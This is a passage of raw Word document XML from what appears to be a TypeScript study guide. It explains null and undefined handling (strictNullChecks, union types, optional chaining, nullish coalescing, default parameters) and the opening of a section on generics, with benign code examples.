    <w:p w14:paraId="37791542" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Strict Null Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31548D"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t>Strict Null Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By enabling strictNullChecks in your tsconfig.json file, TypeScript will enforce stricter rules regarding null and undefined. This setting helps catch potential issues at compile time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA371E7"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F558CC7"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"compilerOptions": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30066A50"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"strictNullChecks": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01294580"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75BE916"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C09C391"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>With strictNullChecks enabled, null and undefined are not included in the type of other values by default. For example, string and number types will not accept null or undefined values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA05718" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Union Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A2BDE"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can explicitly allow null or undefined as part of a type using union types. This approach helps you specify when null or undefined is an acceptable value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B1B459"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2585E4D"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name: string | null = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326A9BB"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name = "John"; // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A4B38"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name = null;   // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6634667A"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p>
    <w:p w14:paraId="034C4CF0"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age: number | undefined;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213034E8"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age = 25;      // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A7815"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age = undefined; // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D9943" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Optional Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3DA529"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When defining object properties, you can use optional properties to indicate that a property may be undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF5FF9E"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636C3542"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49440569"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51905E37"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 // age is optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B525A"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8130F86"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p>
    <w:p w14:paraId="6E4776CC"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person1: Person = { name: "Alice" }; // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A55842"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person2: Person = { name: "Bob", age: 30 }; // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037C866" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Non-Nullable Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070FC487"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to ensure that a value is never null or undefined, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Nullable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> type utility. This utility type excludes null and undefined from a type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F32FDC"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293AB4B"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NonNullableString = NonNullable&lt;string | null | undefined&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F3843"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p>
    <w:p w14:paraId="76BE17E9"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value: NonNullableString;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A840F9"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value = "Hello"; // Valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1900F"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value = null;    // Error: Type 'null' is not assignable to type 'NonNullableString'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90762D"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value = undefined; // Error: Type 'undefined' is not assignable to type 'NonNullableString'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12774F" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Type Guards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877FF2C"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type guards help you check for null or undefined values at runtime and safely handle them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E84FCEC"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8DC8B30"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processValue(value: string | null | undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD494FE"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(value !== null &amp;&amp; value !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964A4F9"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console.log(value.toUpperCase()); // Safe to use 'value' as 'string'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6519AFFC"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258133FC"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console.log("Value is null or undefined");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4116D"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F0D7C5B"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3688F45"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t>Using Optional Chaining and Nullish Coalescing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D063B" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optional Chaining (?.)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allows you to safely access deeply nested properties that might be null or undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5002B"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4280A4C3" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DB450" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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profile?: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B5B58" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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email?: string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C2997" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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F4471E7" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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FD2820F" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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9D45CCD" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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user: User = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F91F47" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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email = user.profile?.email; // Safe access, email will be undefined if profile or email is undefined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A31DBE9" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nullish Coalescing (??)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides a default value when the left-hand side is null or undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE2973"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965FB44"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input: string | undefined = undefined;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58656500"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defaultValue = input ?? "Default"; // DefaultValue will be "Default"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0903C" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Avoiding null and undefined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A2276"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lastRenderedPageBreak/>
        <w:t>Avoid Using null and undefined for Default Values</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD912CF" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prefer using default parameters or initial values instead of null or undefined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB3787A" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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BAB0C74"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greet(name: string = "Guest") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09B414"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console.log(`Hello, ${name}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E395C"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2FB4CF2" w14:textId="77777777" w:rsidR="00D91C4A" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4A" w:rsidP="009E0607">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651533AE" w14:textId="2A9493F4" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="00D91C4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greet(); // Hello, Guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A99B6" w14:textId="796C7E50" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc178383287"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the concept of generics in TypeScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="1FA0DE01"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Generics in TypeScript provide a way to create reusable and flexible components and functions that work with a variety of types while maintaining type safety. Generics allow you to write code that is both type-safe and flexible, making it easier to handle different data types in a consistent manner. Here’s a detailed look at how generics work and how to use them effectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79718A7A" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Basic Generics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA5A6B"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Generics enable you to define a function, class, or interface that works with multiple types without losing the information about the type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB6428"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Generic Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C4FC3"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identity&lt;T&gt;(value: T): T {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCCA2D"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value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E4EE1F"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09009EF"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p>
    <w:p w14:paraId="00D9D42B"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numberResult = identity(123); // number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD2DE5"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stringResult = identity("hello"); // string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C66D7A"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In the example above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6462CAF8" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>T is a generic type parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D116A6E" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The function identity can accept any type and return the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CCBBC" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Generic Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190D9F8"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You can use generics with interfaces to define structures that can work with various types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06BD70"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Generic Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076035DB"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GenericBox&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FED267"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value: T;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA639B"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72BEEE6"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p>
    <w:p w14:paraId="7B78D33B"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numberBox: GenericBox&lt;number&gt; = { value: 42 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C6AEE"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stringBox: GenericBox&lt;string&gt; = { value: "hello" };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF06E6"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Here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A8889C" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GenericBox&lt;T&gt; is an interface with a generic type parameter T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348DA775" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>numberBox and stringBox are instances of GenericBox with different types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E04BA" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Generic Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E82983"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Generics can be used with classes to create flexible and reusable class definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D6D8A"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Generic Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1DC11A"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Box&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385EDF7"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private _value: T;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24070FBF"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DF3E542"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constructor(value: T) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEEAC5"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this._value = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61716094"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59305E0"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45542BD"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getValue(): T {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EDF066"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this._value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C6B8C"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726A250"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02DC9B5"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79FD4C8"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numberBox = new Box(123); // number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B2E70E"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stringBox = new Box("hello"); // string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56E99C"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D0A98" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Box&lt;T&gt; is a class with a generic type parameter T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9C4C0D" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The class can handle any type for its _value property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E58AD" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
